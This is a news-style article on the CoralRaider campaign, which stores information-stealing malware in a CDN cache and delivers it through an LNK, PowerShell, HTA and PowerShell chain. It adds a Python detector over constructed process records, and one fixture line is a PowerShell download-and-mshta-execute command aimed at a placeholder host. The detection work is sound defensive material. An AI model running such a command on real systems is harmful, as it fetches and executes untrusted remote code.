Content Delivery Networks Abused to Deliver Malware by Cybercriminals

Cybersecurity researchers have discovered a campaign by the hacker group CoralRaider that leverages a novel method to deliver information-stealing malware. The attacks target computer systems in the United States, United Kingdom, Germany, and Japan.

Traditionally, cybercriminals use malicious links or infected attachments to deliver malware. In this instance, CoralRaider is exploiting a content delivery network (CDN) cache to store the malware. CDNs are networks of servers distributed across the globe that cache copies of website content. They play a crucial role in ensuring fast loading times by serving each user from the closest server.

In this campaign, CoralRaider uploads the information-stealing malware to a compromised website hosted on the Bynny CDN platform. The malware then resides within the CDN cache, allowing the attackers to use legitimate CDN infrastructure for malicious purposes. This technique offers CoralRaider several advantages. Because the download originates from a reputable CDN rather than an unknown host, it can slip past security controls that flag downloads from suspicious or unknown sources. Additionally, the geographically distributed nature of CDNs lets the malware reach victims worldwide quickly, with minimal download times.

The attacks begin with victims opening an archive containing a malicious Windows shortcut file (LNK). When the LNK file is executed, it triggers PowerShell commands that download a heavily obfuscated HTML application (HTA) file from a subdomain on the compromised Bynny CDN server. The HTA file contains JavaScript code that retrieves and executes a PowerShell script responsible for decrypting the actual malware payload. This multi-layered approach makes it more difficult for security software to detect the malicious activity.
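As an added example, not code from the original report or from the researchers, the following check runs over constructed Sysmon-style process-creation records and flags the chain described above. It assumes the chain shows up in endpoint telemetry as a parent-child lineage (LNK-launched PowerShell fetching an .hta over HTTP(S), mshta.exe running it, then a second PowerShell spawned by the HTA's script); the CDN hostname is a placeholder, not an indicator from the report.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation records (not real campaign data);
# the CDN hostname is a placeholder, not an indicator from the report.
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": "powershell.exe",   # launched via the LNK
     "cmdline": "powershell.exe -w hidden -c iwr https://cdn-placeholder.example/a/b.hta "
                "-o $env:TEMP\\b.hta; mshta $env:TEMP\\b.hta"},
    {"pid": 102, "ppid": 101, "image": "mshta.exe",        # runs the obfuscated HTA
     "cmdline": "mshta.exe C:\\Users\\u\\AppData\\Local\\Temp\\b.hta"},
    {"pid": 103, "ppid": 102, "image": "powershell.exe",   # stage spawned by the HTA's JS
     "cmdline": "powershell.exe -ep bypass -enc QQBB"},
    {"pid": 200, "ppid": 100, "image": "powershell.exe",   # benign admin use, must not match
     "cmdline": "powershell.exe Get-Process"},
]

# An http(s) URL whose path ends in .hta anywhere in a command line.
HTA_URL = re.compile(r"https?://[^\s'\"]+\.hta\b", re.IGNORECASE)


def find_hta_chains(events: List[Dict]) -> List[Dict]:
    """Return one record per mshta.exe whose parent is a PowerShell process that
    fetched an .hta over HTTP(S) and that itself spawned a further PowerShell.
    Each record names the three stages and the HTA URL for triage."""
    by_pid = {e["pid"]: e for e in events}
    children: Dict[int, List[Dict]] = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    hits = []
    for hta in (e for e in events if e["image"].lower() == "mshta.exe"):
        parent = by_pid.get(hta["ppid"])
        if not parent or parent["image"].lower() != "powershell.exe":
            continue
        m = HTA_URL.search(parent["cmdline"])
        if not m:
            continue  # mshta from a non-downloading parent: not this chain
        next_ps = [c for c in children.get(hta["pid"], [])
                   if c["image"].lower() == "powershell.exe"]
        if not next_ps:
            continue  # HTA that never hands off to PowerShell: not this chain
        hits.append({"stage1_ps": parent["pid"], "hta": hta["pid"],
                     "stage2_ps": next_ps[0]["pid"], "hta_url": m.group(0)})
    return hits
```

Requiring all three stages keeps ordinary administrative PowerShell (pid 200 above) from matching; a looser rule on the .hta URL alone is a useful hunting query but will fire more often.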

The ultimate objective of the CoralRaider campaign is to deploy information-stealing malware. Once installed on a victim's machine, this malware can steal sensitive information such as login credentials, financial data, and social media account details. This stolen information can then be used for various fraudulent activities, including identity theft and financial scams.

Security researchers recommend that users exercise caution when opening email attachments, even from seemingly known senders. It's crucial to only download files from trusted sources. Businesses should ensure they have robust security measures in place, including advanced endpoint detection and response (EDR) solutions capable of identifying and blocking malware downloads. Additionally, staying updated on the latest cyber threats and implementing security best practices can significantly reduce the risk of falling victim to such attacks.